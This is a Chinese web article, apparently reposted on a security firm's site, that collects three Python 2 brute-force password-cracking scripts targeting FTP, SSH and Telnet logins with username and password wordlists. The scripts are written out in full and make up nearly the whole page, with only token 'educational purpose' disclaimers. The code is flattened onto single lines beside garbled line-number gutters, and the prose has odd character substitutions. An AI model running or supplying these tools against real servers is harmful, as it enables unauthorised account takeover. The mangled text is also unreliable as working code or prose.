|
|
|
联系客服020-83701501

[投稿]渗透用的python脚本2之密码破解

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
[投稿]浸透用的python脚本2之密码破解

0x00

在浸透测试当中,免不了要进行密码破解。以下为我收集的一些python暴力破解脚本,并非原创作品,但有鉴戒意思。

0x01

FTP暴力破解脚本

Default
123四56七89101112131四15161七1819202122232四25262七2829303132333四35363七3839四0四1四2四3四4四5四6四七四8四9505152535四55565七5859606162636四65666七6869七0七1七2七3七四七5七6七7七8七9808182838四85868七8889909192939四95969七989910010110210310四10510610七10810911011111211311四11511611七11811912012112212312四12512612七12812913013113213313四 #!/usr/bin/env python#-*-coding = utf-8-*-#author:@xfk#blog:@blog.sina.com.cn/kaiyongdeng#date:@2012-05-08 import sys, os, time from ftplib import FTP docs = """            [*] This was written for educational purpose and pentest only. Use it at your own risk.             [*] Author will be not responsible for any damage!            [*] Toolname : ftp_bf.py            [*] Coder :            [*] Version : 0.1            [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt        """  if sys.platform == 'linux' or sys.platform == 'linux2':    clearing = 'clear'else:    clearing = 'cls'os.system(clearing)R = "\033[31m"; G = "\033[32m"; Y = "\033[33m"END = "\033[0m"def logo():    print G+"\n |---------------------------------------------------------------|"    print " | |"    print " | blog.sina.com.cn/kaiyongdeng |"    print " | 08/05/2012 ftp_bf.py v.0.1 |"    print " | FTP Brute Forcing Tool |"    print " | |"    print " |---------------------------------------------------------------|\n"    print " \n [-] %s\n" % time.strftime("%X")    print docs+END def help():    print R+"[*]-t, --target ip/hostname <> Our target"    print "[*]-u, --usernamelist usernamelist <> usernamelist path"    print "[*]-p, --passwordlist passwordlist <> passwordlist path"    print "[*]-h, --help help <> print this help"    print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1) def bf_login(hostname,username,password):    # sys.stdout.write("\r[!]Checking : %s " % (p))    # sys.stdout.flush()    try:        ftp = FTP(hostname)        ftp.login(hostname,username, password)        ftp.retrlines('list')        ftp.quit()        print Y+"\n[!] w00t,w00t!!! We did it ! "        print "[+] Target : ",hostname, ""        print "[+] User : ",username, ""        print "[+] Password : ",password, ""+END        return 1    # sys.exit(1)    except Exception, e:        pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END    sys.exit(1) def anon_login(hostname):    try:        print G+"\n[!] Checking for anonymous login.\n"+END        ftp = FTP(hostname) ftp.login()        ftp.retrlines('LIST')        print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END        ftp.quit()    except Exception, e:        print R+"\n[-] Anonymous login failed...\n"+END        pass def main():    logo()    try:        for arg in sys.argv:            if arg.lower() == '-t' or arg.lower() == '--target':                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]            elif arg.lower() == '-h' or arg.lower() == '--help':                help()            elif len(sys.argv) <= 1:                help()    except:        print R+"[-]Cheak your parametars input\n"+END        help()            print G+"[!] BruteForcing target ..."+END    anon_login(hostname)    # print "here is ok"    # print hostname    try:        usernames = open(usernamelist, "r")        user = usernames.readlines()        count1 = 0        while count1 < len(user):            user[count1] = user[count1].strip()            count1 +=1    except:        print R+"\n[-] Cheak your usernamelist path\n"+END        sys.exit(1)            # print "here is ok ",usernamelist,passwordlist    try:        passwords = open(passwordlist, "r")        pwd = passwords.readlines()        count2 = 0        while count2 < len(pwd):            pwd[count2] = pwd[count2].strip()            count2 +=1    except:        print R+"\n[-] Check your passwordlist path\n"+END        sys.exit(1)     print G+"\n[+] Loaded:",len(user),"usernames"    print "\n[+] Loaded:",len(pwd),"passwords"    print "[+] Target:",hostname    print "[+] Guessing...\n"+END    for u in user: for p in pwd:        result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))        if result != 1:            print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END        else:            print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END        if not result :            print R+"\n[-]There is no username ans password enabled in the list."            print "[-]Exiting...\n"+END if __name__ == "__main__":    main()

 

0x02

SSH暴力破解

Default
123四56七89101112131四15161七1819202122232四25262七2829303132333四35363七3839四0四1四2四3四4四5四6四七四8四9505152535四55565七5859606162636四65666七6869七0七1七2七3七四七5七6七7七8七9808182838四85868七8889909192939四95969七989910010110210310四10510610七10810911011111211311四11511611七11811912012112212312四12512612七12812913013113213313四13513613七1381391四01四11四21四31四41四51四61四七1四81四915015115215315四15515615七 #!/usr/bin/env python#-*-coding = UTF-8-*-#author@:dengyongkai#blog@:blog.sina.com.cn/kaiyongdeng  import sysimport osimport time#from threading import Thread try:    from paramiko import SSHClient    from paramiko import AutoAddPolicyexcept ImportError:    print G+'''    You need paramiko module.    http://www.lag.net/paramiko/        Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n'''+END    sys.exit(1) docs =  """         [*] This was written for educational purpose and pentest only. Use it at your own risk.         [*] Author will be not responsible for any damage!                                                                        [*] Toolname        : ssh_bf.py         [*] Author          : xfk         [*] Version         : v.0.2         [*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """  if sys.platform == 'linux' or sys.platform == 'linux2':         clearing = 'clear'else:            clearing = 'cls'os.system(clearing)  R = "\033[31m";G = "\033[32m";Y = "\033[33m"END = "\033[0m"  def logo():         print G+"\n           |---------------------------------------------------------------|"         print "         |                                                               |"         print "         |               blog.sina.com.cn/kaiyongdeng                    |"         print "         |                16/05/2012 ssh_bf.py v.0.2                     |"         print "         |                  SSH Brute Forcing Tool                       |"         print "         |                                                               |"         print "         |---------------------------------------------------------------|\n"         print " \n                [-] %s\n" % time.ctime()         print docs+END  def help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is 22)" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit(1) def BruteForce(hostname,port,username,password):        '''        Create SSH connection to target        '''        ssh = SSHClient()        ssh.set_missing_host_key_policy(AutoAddPolicy())        try:            ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)            status = 'ok'            ssh.close()        except Exception, e:            status = 'error'            pass return status  def makelist(file):    '''    Make usernames and passwords lists    '''    items = []     try:        fd = open(file, 'r')    except IOError:        print R+'unable to read file \'%s\'' % file+END        pass     except Exception, e:        print R+'unknown error'+END        pass     for line in fd.readlines():        item = line.replace('\n', '').replace('\r', '')        items.append(item)    fd.close()     return items def main():        logo()  # print "hello wold"        try:                    for arg in sys.argv:                        if arg.lower() == '-t' or arg.lower() == '--target':                                hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])       if arg.lower() == '-p' or arg.lower() == '--port':       port = sys.argv[int(sys.argv[1:].index(arg))+2]                        elif arg.lower() == '-u' or arg.lower() == '--userlist':                                userlist = sys.argv[int(sys.argv[1:].index(arg))+2]                        elif arg.lower() == '-w' or arg.lower() == '--wordlist':                                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]                        elif arg.lower() == '-h' or arg.lower() == '--help':                                help() elif len(sys.argv) <= 1:                                help()        except:                 print R+"[-]Cheak your parametars input\n"+END                help()        print G+"\n[!] BruteForcing target ...\n"+END#        print "here is ok"#        print hostname,port,wordlist,userlist        usernamelist = makelist(userlist)        passwordlist = makelist(wordlist)         print Y+"[*] SSH Brute Force Praparing."        print "[*] %s user(s) loaded." % str(len(usernamelist))        print "[*] %s password(s) loaded." % str(len(passwordlist))        print "[*] Brute Force Is Starting......."+END try:         for username in usernamelist:         for password in passwordlist: print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END                 current = BruteForce(hostname, port, username, password)                         if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END#                         pass                         else:                                 print G+"\n[+] ^-^ HaHa,We Got It!!!"                                 print "[+] username: %s" % username                                 print "[+] password: %s\n" % password+END#                               sys.exit(0) except: print R+"\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n"+END raise        print Y+"[+] Done.^-^\n"+END        sys.exit(0)  if __name__ == "__main__": main()

 

0x03

TELNET密码暴力破解

Default
123四56七89101112131四15161七1819202122232四25262七2829303132333四35363七3839四0四1四2四3四4四5四6四七四8四9505152535四55565七5859606162636四65666七6869七0七1七2七3七四七5七6七7七8七9808182 #!usr/bin/python#Telnet Brute Forcer#http://www.darkc0de.com#d3hydr8[at]gmail[dot]com import threading, time, random, sys, telnetlibfrom copy import copy if len(sys.argv) !=四: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit(1) try:   users = open(sys.argv[2], "r").readlines()except(IOError):    print "Error: Check your userlist path\n"   sys.exit(1)  try:   words = open(sys.argv[3], "r").readlines()except(IOError):    print "Error: Check your wordlist path\n"   sys.exit(1) print "\n\t   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"print "\t--------------------------------------------------\n"print "[+] Server:",sys.argv[1]print "[+] Users Loaded:",len(users)print "[+] Words Loaded:",len(words),"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words,  1) words.remove(value[0]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words,  1) users.remove(users[0]) lock.release() if len(users) ==1: return value[0][:-1], users[0] else: return value[0][:-1], users[0][:-1] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"*12 print "User:",user,"Password:",value tn = telnetlib.Telnet(sys.argv[1]) tn.read_until("login: ") tn.write(user + "\n") if password: tn.read_until("Password: ") tn.write(value + "\n") tn.write("ls\n") tn.write("exit\n") print tn.read_all() print "\t\nLogin successful:",value, user tn.close() work.join() sys.exit(2) except: pass for I in range(len(words)*len(users)): work = Worker() work.start() time.sleep(1)

 

Default
1 以上为我收集的几个python暴力破解脚本,巴望对自己有所扶直。

数安新闻+更多

证书相关+更多